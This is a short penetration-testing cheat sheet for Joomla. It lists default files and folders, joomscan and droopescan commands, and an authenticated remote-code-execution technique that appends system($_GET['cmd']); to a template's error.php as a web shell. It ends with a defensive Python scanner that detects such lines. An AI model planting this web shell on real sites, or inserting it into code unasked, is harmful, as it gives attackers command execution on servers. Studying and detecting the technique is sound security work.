Joomla
Standard pages and folders
License files
/readme.txt
/administrator/manifests/files/joomla.xml
/language/en-GB/en-GB.xml
/plugins/system/cache/cache.xml
Login pages
/administrator
Resource folder
plugins/
plugins/system
templates/
Automatic scan tools
joomscan
A tool written in Perl that performs several checks on the Joomla configuration and detects vulnerable components. Can be downloaded from here
perl joomscan.pl --update #update vulnerable dependencies database
perl joomscan.pl --url <url> #perform base checks
perl joomscan.pl -u <url> --ec #enumerate components
droopescan
Limited support for Joomla. Can detect the version and interesting URLs. Can be downloaded from here
droopescan scan joomla --url <url>
Authenticated RCE
After obtaining access to the administrative panel, it is possible to execute commands on the underlying machine by editing a template page.
Select a template to edit
Append
system($_GET['cmd']);
in the error.php page and save
Navigate to
<host>/templates/<template>/error.php?cmd=<cmd>
It is also possible to append a payload that launches a reverse shell and trigger it by visiting the modified page.
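A defender-side check for the template modification described above, as an added example that is not part of the original page: it scans template PHP files for command-execution calls fed by request input, such as the system($_GET['cmd']) line. The function names and the two sample strings are constructed for illustration.

```python
import re
from pathlib import Path

# PHP functions that run OS commands; system() is the one used on this page.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open)"
# Request-controlled superglobals.
REQUEST_VARS = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# A command-execution call whose argument list references request input.
PATTERN = re.compile(rf"\b{EXEC_FUNCS}\s*\([^;]*?{REQUEST_VARS}", re.IGNORECASE)


def find_request_exec(php_source):
    """Return (line_number, line_text) for each suspicious call in php_source."""
    lines = php_source.splitlines()
    hits = []
    for m in PATTERN.finditer(php_source):
        line_no = php_source.count("\n", 0, m.start()) + 1
        hits.append((line_no, lines[line_no - 1].strip()))
    return hits


def scan_templates(root):
    """Scan every .php file under root (e.g. the Joomla templates/ folder)."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_request_exec(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed samples: a stock-looking error page and one with the appended line.
CLEAN = "<?php\ndefined('_JEXEC') or die;\necho $this->error->getMessage();\n"
TAMPERED = CLEAN + "system($_GET['cmd']);\n"

if __name__ == "__main__":
    print(find_request_exec(CLEAN))
    print(find_request_exec(TAMPERED))
```

This is a pattern match and will miss obfuscated variants, so pair it with a comparison of the template files against a known-good copy.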